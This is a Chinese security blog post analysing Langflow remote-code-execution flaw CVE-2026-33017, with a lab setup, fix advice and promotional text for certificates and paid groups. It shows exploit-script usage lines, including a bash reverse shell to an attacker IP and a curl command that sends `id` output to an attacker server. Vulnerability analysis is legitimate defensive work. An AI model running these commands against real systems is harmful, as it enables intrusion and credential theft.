文章总结： 本文详细分析了Langflow1.9.0之前版本存在的远程代码执行漏洞CVE-2026-33017，攻击者可通过未认证的POST请求在/api/v1/buildpublictmp端点注入恶意代码直接执行。文章提供了漏洞原理、影响范围、环境部署、三种利用脚本示例以及修复建议，包括升级到1.9.0版本、网络隔离和凭证轮换等防护措施。 综合评分： 85 文章分类： 漏洞分析,WEB安全,应急响应,解决方案,恶意软件

Langflow RCE与技术细节CVE-2026-33017

原创

MY0723 MY0723

不秃头的安全

2026年3月27日 10:28 北京

在小说阅读器读本章

去阅读

Langflow RCE与技术细节CVE-2026-33017

前言：本文中涉及到的相关技术或工具仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担，如有侵权请私聊删除。
知识星球和交流群在最下方。
需要cn*d（中高）/c2n*d（高与支撑单位）/安全证书请联系vx咨询

Langflow是一款基于Python和FastAPI构建的开源低代码可视化框架，主要用于构建AI工作流、RAG应用及多智能体系统。因其免费和使用便捷，吸引了很多用户。

近日，Langflow系统被曝出高危远程代码执行漏洞，攻击者可通过精心构造的请求直接获取系统权限，危害极大。

1.🎯 漏洞描述

Langflow 1.9.0之前版本存在安全漏洞，该漏洞源于 /api/v1/build_public_tmp/{flow_id}/flow 端点接受攻击者控制的流程数据并传递给exec函数，可能导致未经验证的远程代码执行。攻击者无需任何身份认证，只需发送一个HTTP POST请求即可在目标服务器上执行任意Python代码。

2. ✨ 受影响范围

Langflow ≤ 1.8.1

3.🛰️ 漏洞详情

该漏洞的核心问题出在公开接口：POST /api/v1/build_public_tmp/{flow_id}/flow

该接口的设计初衷是允许匿名用户构建/预览”公开Flow”（无需登录），常用于分享Demo或嵌入式聊天窗口。

正常流程：用户提供flow_id（公开Flow的UUID）→ 后端从数据库加载该Flow的定义 → 构建并返回执行结果

漏洞原理：当请求Body中携带可选参数data时，后端会优先使用用户提交的data，而非数据库中的原始Flow。攻击者可以构造一个看似合法的Flow JSON，其中嵌入自定义Code节点，节点内的code字段直接被exec()执行，且没有任何输入过滤或沙箱限制。

核心缺陷代码：

if data:
    # 直接使用用户提供的data作为Flow定义
    graph = Graph.from_payload(data)
else:
    graph = load_flow_from_db(flow_id)

# 在Custom Component或Code节点中
exec(compiled_code, exec_globals)  # 无沙箱执行

攻击流程：

1. 攻击者发现目标Langflow实例（通过搜索引擎或端口扫描）
2. 获取公开流程的UUID（从分享链接或暴力枚举）
3. 构造恶意HTTP POST请求，在流程数据中嵌入Python代码
4. Langflow服务器调用exec()执行恶意代码（无沙箱隔离）
5. 攻击者获得服务器级别的执行权限

危害描述：

• 窃取API密钥：读取环境变量中的OpenAI、Anthropic、AWS凭证
• 文件系统遍历：探测服务器上的敏感文件和数据库连接字符串
• 建立反向Shell：将服务器控制权移交攻击者
• 部署持久化后门：写入定时任务或启动脚本，确保长期控制

4. 🌐部署环境

Docker部署（受影响版本1.8.1）

# 拉取受影响版本镜像（1.8.1）
docker pull langflowai/langflow:1.8.1

# 创建数据目录
mkdir -p ./langflow-data

# 启动漏洞环境
docker run -d \
  --name langflow-vuln \
  --network host \
  -v ./langflow-data:/app/langflow \
  -e AUTO_LOGIN=true \
  langflowai/langflow:1.8.1

5. 🔐利用脚本

（1）盲确认(最推荐)

python langflow_CVE_2026_33017.py --url http://192.168.40.49:7860 --cmd "bash -c 'bash -i >& /dev/tcp/192.168.20.38/4444 0>&1'"

（2）一键反向Shell模式

python langflow_CVE_2026_33017.py --reverse-shell --url http://192.168.40.49:7860 --lhost 192.168.20.38 --lport 4444

（3）HTTP外传模式

# 1. 启动本地HTTP服务器
python -m http.server 8080
# 2. 命令执行
python langflow_CVE_2026_33017.py --url http://target:7860 --cmd "curl http://10.10.14.1:8080/\$(id | base64 -w0)"

原始脚本下面获取

6. 📑修复建议

• 升级系统： 确保Langflow系统升级到已修复漏洞的最新版本（Langflow ≥ 1.9.0）

pip install --upgrade "langflow>=1.9.0"

• 网络隔离： 将Langflow部署在内网或VPN环境中，避免直接暴露在互联网

# 使用iptables限制访问
iptables -A INPUT -p tcp --dport 7860 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 7860 -s 172.16.0.0/12 -j ACCEPT
iptables -A INPUT -p tcp --dport 7860 -s 192.168.0.0/16 -j ACCEPT
iptables -A INPUT -p tcp --dport 7860 -j DROP

• 禁用自动登录： 设置环境变量AUTO_LOGIN=false
• 凭证轮换： 检查并轮换所有可能泄露的API密钥和凭证

7. 🔄 脚本获取

公众号回复”20260327″即可获取完整RCE PY脚本链接

8. 📚 往期推荐

负载均衡下打内存马的奇淫技巧

人人都能成为代码审计专家（可落地，强的可怕）

ChiXiao (赤霄)现代化红蓝攻防综合平台

FLUX-Web安全扫描工具 关于我们: 感谢各位大佬们关注-不秃头的安全，后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖掘SRC思路等文章，同时会组织不定期抽奖，希望能得到各位的关注与支持，考证请加联系vx咨询。

1. 需要以下各类安全证书的可以联系~

①Cn*d，NCC，NVDB🀄️高漏洞证书

②CNNVD中高\漏洞情报\ 一二三级支撑单位均可协助获得

③CISP、PTE/PTS、CISP-DSG、IRE/IRS、NISP一二级、PMP、CCSK、CISSP/CCSP、CISAW各种类、CCRC\CCSC、itil、软考中高级、CDSP各种类、CISA，oscp等等巨优惠。ISO27001、ITss服务项目经理报名等下证即可，证书组团报更便宜，可对公，可开专普票。以下是其他全部证书

【腾讯文档】【信息安全 数据安全 IT认证证书】～不秃头的安全Vx:Meditation0723

https://docs.qq.com/doc/DZmtOckpOakJrcFVv?#

想加群下方二维码，群过期或群满加下方vx拉：

2. 需要入星球的可以私聊优惠？

1、维护更新src、cnxd、cnnxd专项漏洞知识库，包含原理、挖掘技巧、实战案例
2、fafo/零零信安 高级会员key
3、最新POC通用报告详情分享思路
4、知识星球专属微信“内部圈子交流群”
5、攻防演练资源分享（免杀、溯源、钓鱼等）
6、新鲜工具分享
7、不定期有工作招聘内推（工作/护网内推）
8、19个专栏会持续更新~提前续费有优惠，好用不贵很实惠

3、其他合作（合法合规）

1、承接红蓝攻防、渗透、安全意识培训、基线核查及加固、应急响应、重保防守、代码审计等安全项目（须授权），需要攻防团队或岗位招聘都可代发、代招（灰黑勿扰）；

2、各位安全老板需要文章推广的请私聊，承接合法合规推广文章发布，可直发、可按产品编辑推广；合作、推广代发、安全项目、岗位代招均可发布；

3、接受脱敏投稿,送一年知识星球及礼包。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：不秃头的安全 MY0723 MY0723《Langflow RCE与技术细节CVE-2026-33017》